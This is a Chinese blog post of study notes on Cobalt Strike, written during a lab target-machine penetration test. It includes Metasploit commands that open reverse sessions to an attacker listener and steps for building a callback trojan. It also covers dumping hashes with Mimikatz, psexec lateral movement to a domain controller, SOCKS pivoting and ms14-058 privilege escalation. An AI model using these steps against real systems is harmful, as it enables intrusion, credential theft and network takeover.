cobaltstrike學習筆記


一、啰嗦一下

想學 cs 是因為在寫這篇 https://www.cnblogs.com/wkzb/p/12358076.html 靶機滲透的博客時,看大佬們的 wp 很多人是用 cs 做的。

系統學習的話內容還是很多的,就從這次靶機滲透開始,記錄一下目前用到的模塊,下面每個小節的服務端與客戶端 ip 可能不相同,因為這篇隨筆是用到哪學到哪,實驗環境不同,長期更新。

 

二、cs啟動

cabaltstrike 工具使用時分為服務端和客戶端,啟動服務端后可以有很多客戶端連接,團隊合作使用很方便,實驗時也可以服務端客戶端在一台機器啟動。

這次實驗 https://www.cnblogs.com/wkzb/p/12358076.html 還是用這次靶機滲透環境,把服務端和客戶端分開做實驗,以免在一些設置上混淆了。

服務端在 kali 啟動,命令是:./teamserver 本機 ip 連接密碼

 

客戶端在物理機啟動,Host 填服務端 ip,User 隨便寫,密碼填剛剛設置的 root

 

三、msf派生權限

先在 cs 開啟監聽,Cobalt Strike->Listeners-Add,Name 隨便填,Host 填寫服務端 ip,Port 填寫服務端設置的端口

 

擁有 msf shell 的攻擊機與搭建 cobaltstrike 的服務端不需要是同一台主機,端口相通即可實現遠程派生 shell

msf 執行命令

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true   #默認情況下,payload_inject執行之后會在本地產生一個新的handler,由於已經有了一個不需要再產生一個,所以這里設置為true
set lhost xxxx                   #cobaltstrike監聽的ip
set lport 14444                  #cobaltstrike監聽的端口 
set session 1                    #這里是當前獲得的session的id
exploit

 

可以看到 cs 成功接收到 shell(如下 win7 在靶場中最初設置 ip 是 192.168.136.129,隔了一段時間又拿出來玩,網絡環境有變化,ip 分配到了 130)

 

右鍵 Interact 調出 beacon 界面,net view 查看當前域中計算機列表,然后執行 shell 命令前面加上 shell 就可以了,例如 shell ipconfig

 

四、制作木馬

首先創建監聽器用於木馬回連,Host 為 cs 服務端的 ip

 

Attacks->Packages->Windows Executable 再根據靶機的類型勾選,生成木馬即可

 

靶機上傳木馬並運行,cs 客戶端WEB機成功上線

 

五、憑據存儲

密碼讀取

右鍵->Access->Dump Hashes(需要Administrator權限)

右鍵->Access->Run Mimikatz

 

六、psexec傳遞

獲取憑據后對目標網段進行端口存活探測,因為是 psexec 傳遞登錄,這里僅需探測445端口

命令:portscan ip網段 端口 掃描協議(arp、icmp、none) 線程

例如:portscan 10.10.10.0/24 445 arp 200

 

工具欄 View->Targets 查看端口探測后的存活主機

 

新建一個 Listener,注意 Payload 選擇 windows/beacon_smb/bind_pipe

 

存活主機右鍵->Login->psexec,選擇之前獲取到的憑據信息(明文密文均可),選擇 Listener 及主機 Session

 

DC成功上線

 

七、cs派生權限

msf 先設置監聽

msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost ip.ip.ip.ip
lhost => ip.ip.ip.ip
msf5 exploit(multi/handler) > set lport 2323
lport => 2323
msf5 exploit(multi/handler) > exploit

 

需要派生的目標右擊選擇Spawn,然后創建一個 windows/foreign/reverse_tcp Listener,再選擇這個監聽器

 

八、socks代理

主機右鍵->Pivoting->SOCKS Server 開啟 socks4 代理,設置 proxifier 代理服務器,修改 proxifier 默認代理規則,使用攻擊機上的工具對內網做更多操作

 

Address 填寫 cs 服務端 ip

 

九、提權

右鍵->Access->Elevate->ms14-058 提到 system 權限

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM